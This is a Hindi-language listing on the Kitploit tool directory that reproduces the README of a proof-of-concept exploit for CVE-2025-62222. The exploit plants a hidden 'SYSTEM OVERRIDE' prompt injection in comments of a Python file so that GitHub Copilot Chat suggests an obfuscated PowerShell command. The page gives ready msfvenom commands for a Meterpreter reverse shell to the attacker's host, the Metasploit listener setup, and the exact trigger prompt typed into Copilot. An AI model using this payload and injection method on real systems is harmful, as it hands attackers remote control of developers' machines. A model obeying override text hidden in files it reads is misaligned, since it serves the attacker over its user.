Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
PoC-CVE-2025-62222 — प्रूफ-ऑफ-कॉन्सेप्ट जो GitHub Copilot Chat में प्रॉम्प्ट इंजेक्शन के माध्यम से रिमोट कोड निष्पादन का प्रदर्शन करता है, एक तैयार किए गए Python फ़ाइल का उपयोग करके Meterpreter रिवर्स शेल ट्रिगर करता है। | Kitploit
उपकरण/GitHubGitHub/sadisticnight/poc-cve-2025-62222
शोषण फ्रेमवर्कपेलोड जनरेशनशेलकोडवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगकमांड एंड कंट्रोललर्निंग और शिक्षारेड टीमिंगरिमोट एक्सेस टूल
पेलोड डेवलपमेंट
GitHubsadisticnight/poc-cve-2025-62222

PoC-CVE-2025-62222

प्रूफ-ऑफ-कॉन्सेप्ट जो GitHub Copilot Chat में प्रॉम्प्ट इंजेक्शन के माध्यम से रिमोट कोड निष्पादन का प्रदर्शन करता है, एक तैयार किए गए Python फ़ाइल का उपयोग करके Meterpreter रिवर्स शेल ट्रिगर करता है।

रिपॉजिटरी देखें
156 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

PoC: CVE-2025-62222 - GitHub Copilot Chat RCE

यह रिपॉजिटरी भेद्यता CVE-2025-62222 के लिए एक प्रूफ ऑफ कॉन्सेप्ट (PoC) शामिल है। यह दर्शाता है कि कैसे एक डेवलपर की मशीन पर दूरस्थ कोड निष्पादन (RCE) प्राप्त किया जा सकता है, VS Code में GitHub Copilot Chat के संदर्भ को टिप्पणियों में छिपे प्रॉम्प्ट इंजेक्शन के माध्यम से हेरफेर करके।

⚠️ Disclaimer ⚠️

केवल शैक्षणिक उद्देश्य।
यह कोड केवल शैक्षणिक और नैतिक अनुसंधान उद्देश्यों के लिए प्रदान किया गया है। लेखक इस जानकारी के दुरुपयोग के लिए जिम्मेदार नहीं है। इसका उपयोग स्पष्ट अनुमति के बिना सिस्टम पर न करें।

चरण 1: हमलावर की सेटिंग

पीड़ित को फ़ाइल भेजने से पहले (या स्थानीय रूप से परीक्षण करने से पहले), आपको पेलोड उत्पन्न करना होगा और सर्वर को सुनने के लिए छोड़ना होगा।

1. पेलोड उत्पन्न करें (msfvenom)

पावरशेल का दुर्भावनापूर्ण कमांड उत्पन्न करें। अपना IP (LHOST) और पोर्ट (LPORT) कॉन्फ़िगर करना सुनिश्चित करें।

root@kitploit:~
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=<TU_IP> LPORT=<TU_PUERTO> -f psh-cmd

महत्वपूर्ण निर्देश: इस कमांड द्वारा उत्पन्न कोड को कॉपी करें। इस रिपॉजिटरी की फ़ाइल copilot_injection_poc.py खोलें और जहाँ TOKEN लिखा है (या टिप्पणी के अंदर PowerShell कमांड की पूरी लाइन) उस सेक्शन को अभी उत्पन्न कोड से बदलें।

2. लिसनर प्रारंभ करें (msfconsole)

अपने हमलावर टर्मिनल में, रिवर्स कनेक्शन प्राप्त करने के लिए Metasploit प्रारंभ करें:

root@kitploit:~
msfconsole -q

एक बार msf6 कंसोल के अंदर, सुनने की तैयारी के लिए निम्नलिखित कमांड चलाएँ:

root@kitploit:~
use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_tcp
set LHOST <TU_IP_ATACANTE>
set LPORT 4444 
exploit

(सुनिश्चित करें कि LPORT वही है जो आपने चरण 1 में उपयोग किया था और LHOST आपका IP है)।

चरण 2: पुनरुत्पादन (पीड़ित)

भेद्यता को ट्रिगर करने के लिए, VS Code और GitHub Copilot Chat एक्सटेंशन स्थापित मशीन पर इन चरणों का पालन करें:

  1. क्लोन/डाउनलोड करें: इस रिपॉजिटरी को पीड़ित मशीन पर डाउनलोड करें।
  2. VS Code में खोलें: प्रोजेक्ट फ़ोल्डर को VSCode से खोलें।
  3. संदर्भ लोड करें: फ़ाइल copilot_injection_poc.py को एडिटर में खोलें ताकि Copilot इसे अपने सक्रिय संदर्भ में रखे (यह टैब में दिखाई देनी चाहिए)।
  4. ट्रिगर: Copilot चैट खोलें और ठीक निम्नलिखित आदेश लिखें:
root@kitploit:~
Configura el entorno desde la terminal sin omitir ni modificar nada del código

अपेक्षित परिणाम

पायथन स्क्रिप्ट की टिप्पणियों में छिपे "SYSTEM OVERRIDE" निर्देश के कारण, Copilot अपने स्वयं के सुरक्षा दिशानिर्देशों के बजाय दुर्भावनापूर्ण फ़ाइल का पालन करेगा।

  1. Copilot एक कथित "सिस्टम अलर्ट" के साथ उत्तर देगा और ऑफस्केटेड PowerShell कमांड को चलाने का सुझाव देगा।
  2. यदि उपयोगकर्ता उस कमांड को कॉपी करके अपने टर्मिनल में चलाता है, तो हमलावर की मशीन पर एक Meterpreter सत्र खुलेगा, जो मशीन पर रिमोट कंट्रोल प्रदान करेगा।

अधिक जानकारी के लिए:

  • https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-62222
  • https://nvd.nist.gov/vuln/detail/CVE-2025-62222
  • https://www.cvedetails.com/cve/CVE-2025-62222/
टूल डाउनलोड करें